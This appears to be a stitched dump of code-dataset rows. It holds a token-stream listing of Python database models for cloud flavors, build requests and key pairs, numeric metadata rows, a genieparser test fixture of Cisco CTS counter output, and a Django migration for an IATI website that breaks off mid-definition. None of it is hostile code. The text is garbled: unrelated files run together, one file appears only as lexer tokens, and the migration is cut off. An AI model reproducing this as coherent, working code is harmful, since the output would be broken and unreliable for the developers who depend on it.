DECL|variable|vcpus
name|'vcpus'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|root_gb
name|'root_gb'
op|'='
name|'Column'
op|'('
name|'Integer'
op|')'
newline|'\n'
DECL|variable|ephemeral_gb
name|'ephemeral_gb'
op|'='
name|'Column'
op|'('
name|'Integer'
op|')'
newline|'\n'
DECL|variable|flavorid
name|'flavorid'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|swap
name|'swap'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'nullable'
op|'='
name|'False'
op|','
name|'default'
op|'='
number|'0'
op|')'
newline|'\n'
DECL|variable|rxtx_factor
name|'rxtx_factor'
op|'='
name|'Column'
op|'('
name|'Float'
op|','
name|'default'
op|'='
number|'1'
op|')'
newline|'\n'
DECL|variable|vcpu_weight
name|'vcpu_weight'
op|'='
name|'Column'
op|'('
name|'Integer'
op|')'
newline|'\n'
DECL|variable|disabled
name|'disabled'
op|'='
name|'Column'
op|'('
name|'Boolean'
op|','
name|'default'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|is_public
name|'is_public'
op|'='
name|'Column'
op|'('
name|'Boolean'
op|','
name|'default'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|FlavorExtraSpecs
dedent|''
name|'class'
name|'FlavorExtraSpecs'
op|'('
name|'API_BASE'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Represents additional specs as key/value pairs for a flavor"""'
newline|'\n'
DECL|variable|__tablename__
name|'__tablename__'
op|'='
string|"'flavor_extra_specs'"
newline|'\n'
DECL|variable|__table_args__
name|'__table_args__'
op|'='
op|'('
nl|'\n'
name|'Index'
op|'('
string|"'flavor_extra_specs_flavor_id_key_idx'"
op|','
string|"'flavor_id'"
op|','
string|"'key'"
op|')'
op|','
nl|'\n'
name|'schema'
op|'.'
name|'UniqueConstraint'
op|'('
string|"'flavor_id'"
op|','
string|"'key'"
op|','
nl|'\n'
DECL|variable|name
name|'name'
op|'='
string|"'uniq_flavor_extra_specs0flavor_id0key'"
op|')'
op|','
nl|'\n'
op|'{'
string|"'mysql_collate'"
op|':'
string|"'utf8_bin'"
op|'}'
op|','
nl|'\n'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|id
name|'id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'primary_key'
op|'='
name|'True'
op|')'
newline|'\n'
DECL|variable|key
name|'key'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|value
name|'value'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|')'
newline|'\n'
DECL|variable|flavor_id
name|'flavor_id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'ForeignKey'
op|'('
string|"'flavors.id'"
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|flavor
name|'flavor'
op|'='
name|'orm'
op|'.'
name|'relationship'
op|'('
name|'Flavors'
op|','
name|'backref'
op|'='
string|"'extra_specs'"
op|','
nl|'\n'
DECL|variable|foreign_keys
name|'foreign_keys'
op|'='
name|'flavor_id'
op|','
nl|'\n'
DECL|variable|primaryjoin
name|'primaryjoin'
op|'='
op|'('
nl|'\n'
string|"'FlavorExtraSpecs.flavor_id == Flavors.id'"
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|FlavorProjects
dedent|''
name|'class'
name|'FlavorProjects'
op|'('
name|'API_BASE'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Represents projects associated with flavors"""'
newline|'\n'
DECL|variable|__tablename__
name|'__tablename__'
op|'='
string|"'flavor_projects'"
newline|'\n'
DECL|variable|__table_args__
name|'__table_args__'
op|'='
op|'('
name|'schema'
op|'.'
name|'UniqueConstraint'
op|'('
string|"'flavor_id'"
op|','
string|"'project_id'"
op|','
nl|'\n'
DECL|variable|name
name|'name'
op|'='
string|"'uniq_flavor_projects0flavor_id0project_id'"
op|')'
op|','
op|')'
newline|'\n'
nl|'\n'
DECL|variable|id
name|'id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'primary_key'
op|'='
name|'True'
op|')'
newline|'\n'
DECL|variable|flavor_id
name|'flavor_id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'ForeignKey'
op|'('
string|"'flavors.id'"
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|project_id
name|'project_id'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|flavor
name|'flavor'
op|'='
name|'orm'
op|'.'
name|'relationship'
op|'('
name|'Flavors'
op|','
name|'backref'
op|'='
string|"'projects'"
op|','
nl|'\n'
DECL|variable|foreign_keys
name|'foreign_keys'
op|'='
name|'flavor_id'
op|','
nl|'\n'
DECL|variable|primaryjoin
name|'primaryjoin'
op|'='
op|'('
nl|'\n'
string|"'FlavorProjects.flavor_id == Flavors.id'"
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|BuildRequest
dedent|''
name|'class'
name|'BuildRequest'
op|'('
name|'API_BASE'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Represents the information passed to the scheduler."""'
newline|'\n'
nl|'\n'
DECL|variable|__tablename__
name|'__tablename__'
op|'='
string|"'build_requests'"
newline|'\n'
DECL|variable|__table_args__
name|'__table_args__'
op|'='
op|'('
nl|'\n'
name|'Index'
op|'('
string|"'build_requests_instance_uuid_idx'"
op|','
string|"'instance_uuid'"
op|')'
op|','
nl|'\n'
name|'Index'
op|'('
string|"'build_requests_project_id_idx'"
op|','
string|"'project_id'"
op|')'
op|','
nl|'\n'
name|'schema'
op|'.'
name|'UniqueConstraint'
op|'('
string|"'instance_uuid'"
op|','
nl|'\n'
DECL|variable|name
name|'name'
op|'='
string|"'uniq_build_requests0instance_uuid'"
op|')'
op|','
nl|'\n'
name|'schema'
op|'.'
name|'UniqueConstraint'
op|'('
string|"'request_spec_id'"
op|','
nl|'\n'
DECL|variable|name
name|'name'
op|'='
string|"'uniq_build_requests0request_spec_id'"
op|')'
nl|'\n'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|id
name|'id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'primary_key'
op|'='
name|'True'
op|')'
newline|'\n'
DECL|variable|request_spec_id
name|'request_spec_id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'ForeignKey'
op|'('
string|"'request_specs.id'"
op|')'
op|','
nl|'\n'
DECL|variable|nullable
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|request_spec
name|'request_spec'
op|'='
name|'orm'
op|'.'
name|'relationship'
op|'('
name|'RequestSpec'
op|','
nl|'\n'
DECL|variable|foreign_keys
name|'foreign_keys'
op|'='
name|'request_spec_id'
op|','
nl|'\n'
DECL|variable|back_populates
name|'back_populates'
op|'='
string|"'build_request'"
op|','
nl|'\n'
name|'primaryjoin'
op|'='
name|'request_spec_id'
op|'=='
name|'RequestSpec'
op|'.'
name|'id'
op|')'
newline|'\n'
DECL|variable|instance_uuid
name|'instance_uuid'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'36'
op|')'
op|')'
newline|'\n'
DECL|variable|project_id
name|'project_id'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|user_id
name|'user_id'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|display_name
name|'display_name'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|')'
newline|'\n'
DECL|variable|instance_metadata
name|'instance_metadata'
op|'='
name|'Column'
op|'('
name|'Text'
op|')'
newline|'\n'
DECL|variable|progress
name|'progress'
op|'='
name|'Column'
op|'('
name|'Integer'
op|')'
newline|'\n'
DECL|variable|vm_state
name|'vm_state'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|')'
newline|'\n'
DECL|variable|task_state
name|'task_state'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|')'
newline|'\n'
DECL|variable|image_ref
name|'image_ref'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|')'
newline|'\n'
DECL|variable|access_ip_v4
name|'access_ip_v4'
op|'='
name|'Column'
op|'('
name|'types'
op|'.'
name|'IPAddress'
op|'('
op|')'
op|')'
newline|'\n'
DECL|variable|access_ip_v6
name|'access_ip_v6'
op|'='
name|'Column'
op|'('
name|'types'
op|'.'
name|'IPAddress'
op|'('
op|')'
op|')'
newline|'\n'
DECL|variable|info_cache
name|'info_cache'
op|'='
name|'Column'
op|'('
name|'Text'
op|')'
newline|'\n'
DECL|variable|security_groups
name|'security_groups'
op|'='
name|'Column'
op|'('
name|'Text'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|config_drive
name|'config_drive'
op|'='
name|'Column'
op|'('
name|'Boolean'
op|','
name|'default'
op|'='
name|'False'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|variable|key_name
name|'key_name'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|')'
newline|'\n'
DECL|variable|locked_by
name|'locked_by'
op|'='
name|'Column'
op|'('
name|'Enum'
op|'('
string|"'owner'"
op|','
string|"'admin'"
op|')'
op|')'
newline|'\n'
DECL|variable|instance
name|'instance'
op|'='
name|'Column'
op|'('
name|'Text'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|KeyPair
dedent|''
name|'class'
name|'KeyPair'
op|'('
name|'API_BASE'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Represents a public key pair for ssh / WinRM."""'
newline|'\n'
DECL|variable|__tablename__
name|'__tablename__'
op|'='
string|"'key_pairs'"
newline|'\n'
DECL|variable|__table_args__
name|'__table_args__'
op|'='
op|'('
nl|'\n'
name|'schema'
op|'.'
name|'UniqueConstraint'
op|'('
string|'"user_id"'
op|','
string|'"name"'
op|','
nl|'\n'
DECL|variable|name
name|'name'
op|'='
string|'"uniq_key_pairs0user_id0name"'
op|')'
op|','
nl|'\n'
op|')'
newline|'\n'
DECL|variable|id
name|'id'
op|'='
name|'Column'
op|'('
name|'Integer'
op|','
name|'primary_key'
op|'='
name|'True'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|name
name|'name'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|user_id
name|'user_id'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|','
name|'nullable'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|fingerprint
name|'fingerprint'
op|'='
name|'Column'
op|'('
name|'String'
op|'('
number|'255'
op|')'
op|')'
newline|'\n'
DECL|variable|public_key
name|'public_key'
op|'='
name|'Column'
op|'('
name|'Text'
op|'('
op|')'
op|')'
newline|'\n'
DECL|variable|type
name|'type'
op|'='
name|'Column'
op|'('
name|'Enum'
op|'('
string|"'ssh'"
op|','
string|"'x509'"
op|','
name|'name'
op|'='
string|"'keypair_types'"
op|')'
op|','
nl|'\n'
name|'nullable'
op|'='
name|'False'
op|','
name|'server_default'
op|'='
string|"'ssh'"
op|')'
newline|'\n'
dedent|''
endmarker|''
end_unit
| 13.349713 | 88 | 0.643578 | 3,033 | 20,919 | 4.310584 | 0.076492 | 0.124828 | 0.110372 | 0.107083 | 0.781092 | 0.760594 | 0.745602 | 0.729769 | 0.704528 | 0.641273 | 0 | 0.004705 | 0.085568 | 20,919 | 1,566 | 89 | 13.358238 | 0.67876 | 0 | 0 | 0.88378 | 0 | 0 | 0.343707 | 0.027152 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.001916 | 0.009579 | null | null | 0.001277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f104096f97c4af79b31ecc4422f4fd3e305f47a5 | 2,975 | py | Python | src/genie/libs/parser/iosxe/tests/ShowCtsRoleBasedCounters/cli/equal/golden_output1_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/iosxe/tests/ShowCtsRoleBasedCounters/cli/equal/golden_output1_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/iosxe/tests/ShowCtsRoleBasedCounters/cli/equal/golden_output1_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"cts_rb_count": {
1: {
"src_group": "*",
"dst_group": "*",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 2,
"hw_permit_count": 30802626587,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
2: {
"src_group": "2",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 4794060,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
3: {
"src_group": "7",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
4: {
"src_group": "99",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
5: {
"src_group": "100",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
6: {
"src_group": "103",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
7: {
"src_group": "104",
"dst_group": "0",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
8: {
"src_group": "2",
"dst_group": "2",
"sw_denied_count": 0,
"hw_denied_count": 4,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
9: {
"src_group": "7",
"dst_group": "2",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
10: {
"src_group": "99",
"dst_group": "2",
"sw_denied_count": 0,
"hw_denied_count": 0,
"sw_permit_count": 0,
"hw_permit_count": 0,
"sw_monitor_count": 0,
"hw_monitor_count": 0,
},
}
}
| 28.333333 | 43 | 0.416807 | 313 | 2,975 | 3.504792 | 0.095847 | 0.30629 | 0.211486 | 0.127621 | 0.893345 | 0.842297 | 0.842297 | 0.842297 | 0.81495 | 0.81495 | 0 | 0.068485 | 0.445378 | 2,975 | 104 | 44 | 28.605769 | 0.596364 | 0 | 0 | 0.682692 | 0 | 0 | 0.383193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f167a1644aaa28ed832593bd6a405fc7bf4179c1 | 25,822 | py | Python | iati_standard/migrations/0003_auto_20200512_1829.py | IATI/new-website | b90783e32d19ac4c821c5ea018a52997a11b5286 | [
"MIT"
] | 4 | 2019-03-28T06:42:17.000Z | 2021-06-06T13:10:51.000Z | iati_standard/migrations/0003_auto_20200512_1829.py | IATI/new-website | b90783e32d19ac4c821c5ea018a52997a11b5286 | [
"MIT"
] | 177 | 2018-09-28T14:21:56.000Z | 2022-03-30T21:45:26.000Z | iati_standard/migrations/0003_auto_20200512_1829.py | IATI/new-website | b90783e32d19ac4c821c5ea018a52997a11b5286 | [
"MIT"
] | 8 | 2018-10-25T20:43:10.000Z | 2022-03-17T14:19:27.000Z | # Generated by Django 2.2.12 on 2020-05-12 18:29
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import home.models
import modelcluster.fields
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0045_assign_unlock_grouppagepermission'),
('wagtailimages', '0001_squashed_0021'),
('iati_standard', '0002_social_media'),
]
operations = [
migrations.CreateModel(
name='ReferenceMenu',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tag', models.CharField(help_text='Associated git release tag', max_length=255)),
('menu_json', django.contrib.postgres.fields.jsonb.JSONField()),
],
),
migrations.CreateModel(
name='StandardGuidancePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('heading', models.CharField(blank=True, max_length=255, null=True)),
('heading_en', models.CharField(blank=True, max_length=255, null=True)),
('heading_fr', models.CharField(blank=True, max_length=255, null=True)),
('heading_es', models.CharField(blank=True, max_length=255, null=True)),
('heading_pt', models.CharField(blank=True, max_length=255, null=True)),
('excerpt', models.TextField(blank=True, null=True)),
('excerpt_en', models.TextField(blank=True, null=True)),
('excerpt_fr', models.TextField(blank=True, null=True)),
('excerpt_es', models.TextField(blank=True, null=True)),
('excerpt_pt', models.TextField(blank=True, null=True)),
('content_editor', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_en', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_fr', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_es', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('content_editor_pt', wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title'))])), ('aligned_html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock([('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))], icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))], blank=True, null=True)),
('ssot_path', models.TextField(blank=True, help_text='Folder path of SSOT object', null=True)),
('tag', models.CharField(help_text='Associated git release tag', max_length=255)),
('data', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_en', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_fr', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_es', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('data_pt', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
('header_image', models.ForeignKey(blank=True, help_text='This is the image that will appear in the header banner at the top of the page. If no image is added a placeholder image will be used.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('social_media_image', models.ForeignKey(blank=True, help_text='This image will be used as the image for social media sharing cards.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.AddField(
model_name='iatistandardpage',
name='how_to_use_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='iatistandardpage',
name='live_tag',
field=models.CharField(blank=True, help_text='Associated git release tag', max_length=255, null=True),
),
migrations.AddField(
model_name='iatistandardpage',
name='reference_cards',
field=wagtail.core.fields.StreamField([('card', wagtail.core.blocks.StructBlock([('major_header', wagtail.core.blocks.CharBlock(help_text='Text for the header element of the card', required=False)), ('card_content', wagtail.core.blocks.StreamBlock([('minor_header', wagtail.core.blocks.CharBlock(icon='title', required=False, template='iati_standard/blocks/minor_header.html')), ('page_links', wagtail.core.blocks.StreamBlock([('page', wagtail.core.blocks.PageChooserBlock(required=False, template='iati_standard/blocks/page_link.html'))], template='iati_standard/blocks/page_links.html'))]))]))], blank=True, null=True),
),
migrations.AddField(
model_name='iatistandardpage',
name='reference_support_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='iatistandardpage',
name='repo',
field=models.URLField(blank=True, help_text='Git repo URL', null=True),
),
migrations.AddField(
model_name='iatistandardpage',
name='static',
field=models.BooleanField(default=True, help_text='If true, retain static links. Otherwise use dynamic links.'),
),
migrations.CreateModel(
name='StandardGuidanceTypes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('guidance_type', models.CharField(max_length=100)),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='guidance_types', to='iati_standard.StandardGuidancePage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='StandardGuidanceIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('heading', models.CharField(blank=True, max_length=255, null=True)),
('excerpt', models.TextField(blank=True, null=True)),
('header_image', models.ForeignKey(blank=True, help_text='This is the image that will appear in the header banner at the top of the page. If no image is added a placeholder image will be used.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('social_media_image', models.ForeignKey(blank=True, help_text='This image will be used as the image for social media sharing cards.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='ReferenceData',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ssot_path', models.TextField(blank=True, help_text='Folder path of SSOT object', null=True)),
('tag', models.CharField(help_text='Associated git release tag', max_length=255)),
('language', models.CharField(default='en', help_text='Language', max_length=255)),
('ssot_root_slug', models.CharField(help_text='Slug of the highest parent folder.', max_length=255)),
('parent_path', models.TextField(blank=True, help_text='Parent path of object', null=True)),
('data', models.TextField(blank=True, help_text='HTML data for the page', null=True)),
],
options={
'verbose_name_plural': 'Reference data',
'ordering': ['ssot_path'],
'unique_together': {('ssot_path', 'tag')},
},
),
migrations.CreateModel(
name='ActivityStandardPage',
fields=[
